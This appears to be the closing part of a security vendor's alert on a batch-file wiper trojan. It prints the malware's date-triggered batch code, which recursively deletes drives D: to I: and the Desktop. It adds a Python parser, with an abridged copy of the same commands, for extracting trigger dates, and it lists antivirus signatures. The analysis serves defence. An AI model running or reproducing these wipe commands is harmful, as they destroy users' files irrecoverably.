      if "%date%"=="Mon 11/11/2013" goto yes
      if "%date%"=="Tue 11/12/2013" goto yes
      if "%date%"=="Wed 11/13/2013" goto yes
      if "%date%"=="Mon 02/03/2014" goto yes
      if "%date%"=="Tue 02/04/2014" goto yes
      if "%date%"=="Wed 02/05/2014" goto yes
      if "%date%"=="Mon 05/05/2014" goto yes
      if "%date%"=="Tue 05/06/2014" goto yes
      if "%date%"=="Wed 05/07/2014" goto yes
      if "%date%"=="Mon 08/11/2014" goto yes
      if "%date%"=="Tue 08/12/2014" goto yes
      if "%date%"=="Wed 08/13/2014" goto yes
      if "%date%"=="Mon 02/02/2015" goto yes
      if "%date%"=="Tue 02/03/2015" goto yes
      if "%date%"=="Wed 02/04/2015" goto yes
      goto no
      :yes
      sleep for 3000
      IF EXIST d: del "d:\*.*" /q /s /f
      IF EXIST d: Chkdsk d:
      IF EXIST e: del "e:\*.*" /q /s /f
      IF EXIST e: Chkdsk e:
      IF EXIST f: del "f:\*.*" /q /s /f
      IF EXIST f: Chkdsk f:
      IF EXIST g: del "g:\*.*" /q /s /f
      IF EXIST g: Chkdsk g:
      IF EXIST h: del "h:\*.*" /q /s /f
      IF EXIST h: Chkdsk h:
      IF EXIST i: del "i:\*.*" /q /s /f
      IF EXIST i: Chkdsk i:
      del "%userprofile%\Desktop\*.*" /q /s /f
      \start calc
      :no

The .bat files are deleted after execution.
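Rather than waiting for the trigger dates, an analyst can pull them straight out of the script. The following Python is an added example, not part of the alert: it extracts the %date% comparisons and the wiped drive letters from a batch file of this shape, parses the dates, and answers when the next wipe would run. It assumes the script was written for the en-US cmd.exe %date% format (weekday abbreviation followed by MM/DD/YYYY), which is what the comparisons above require; on a system with any other regional date format the string comparison never matches and the wipe never runs. The script it parses is a constructed, abridged stand-in with the same structure, not the sample's full batch.

```python
import re
from datetime import date, datetime

# One trigger line of the wiper: if "%date%"=="Mon 12/10/2012" goto yes
TRIGGER_RE = re.compile(r'^\s*if\s+"%date%"=="([^"]+)"\s+goto\s+yes\s*$', re.IGNORECASE | re.MULTILINE)
# One wipe line: IF EXIST d: del "d:\*.*" /q /s /f
WIPE_RE = re.compile(r'^\s*IF EXIST (\w:) del "\1\\\*\.\*"', re.IGNORECASE | re.MULTILINE)
# Weekday prefix plus US short date, as cmd.exe prints %date% under en-US regional settings.
DATE_FORMAT = "%a %m/%d/%Y"


def trigger_dates(script: str) -> list:
    """Unique trigger dates in the script, sorted ascending; lines that do not parse are skipped."""
    found = set()
    for raw in TRIGGER_RE.findall(script):
        try:
            found.add(datetime.strptime(raw, DATE_FORMAT).date())
        except ValueError:
            continue
    return sorted(found)


def wiped_drives(script: str) -> list:
    """Drive letters the script deletes recursively, upper-cased and sorted."""
    return sorted({d.upper() for d in WIPE_RE.findall(script)})


def next_trigger(script: str, today_iso: str):
    """First trigger date on or after today (ISO yyyy-mm-dd), or None when all have passed."""
    today = date.fromisoformat(today_iso)
    return next((d for d in trigger_dates(script) if d >= today), None)


# Constructed abridged script with the same structure as jucheck.bat above (a repeated date
# is included on purpose to show that duplicates collapse).
SAMPLE_SCRIPT = r'''@echo off & setlocal
sleep for 2
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes
if "%date%"=="Mon 12/10/2012" goto yes
goto no
:yes
sleep for 3000
IF EXIST d: del "d:\*.*" /q /s /f
IF EXIST d: Chkdsk d:
IF EXIST e: del "e:\*.*" /q /s /f
IF EXIST e: Chkdsk e:
del "%userprofile%\Desktop\*.*" /q /s /f
:no
'''

if __name__ == "__main__":
    print([d.isoformat() for d in trigger_dates(SAMPLE_SCRIPT)])
    print(wiped_drives(SAMPLE_SCRIPT))
    print(next_trigger(SAMPLE_SCRIPT, "2013-01-01"))
```

Running this over the full jucheck.bat gives the complete trigger calendar, which is the detail a response team needs to decide how urgently infected hosts and any drives mapped as D: through I: have to be isolated.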

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: DelFiles.NBV (Trojan)
  • GAV: Batchwiper.A (Trojan)